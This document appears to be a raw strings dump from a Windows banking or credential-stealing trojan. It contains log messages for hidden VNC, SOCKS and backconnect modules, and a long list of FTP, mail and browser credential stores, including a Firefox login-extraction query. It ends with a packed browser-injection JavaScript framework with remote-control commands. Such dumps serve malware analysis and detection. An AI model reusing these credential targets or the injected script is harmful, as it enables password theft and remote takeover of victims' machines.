
[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

%System%\wbem\wmiprvse.exe

%System%\wbem\wmiprvse.exe

Explorer.EXE_888_rwx_01EA0000_00054000:

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k 